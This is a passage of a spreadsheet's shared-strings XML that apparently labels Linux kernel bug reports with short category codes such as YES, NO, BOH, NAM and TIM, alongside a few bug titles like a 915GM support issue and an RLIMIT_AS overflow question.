    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MEM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Sound looping on 2.6.7, nforce audio, alsa.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NUM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MEM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARU</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MEM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARU</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAU</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARU</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>S1 suspend/resume resets thermal limits -- TP 600X</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Intel 915GM not supported by Kernel 2.6.11.x</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>S4 resume hang -- sk98  &amp; snd_intel8x0 -- Asus L5D</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NUM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>RLIMIT_AS check potential integer overflow?</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MEM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Initialize frequency properly at the acpi-cpufreq load time</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MEM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MEM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAU</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAU</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
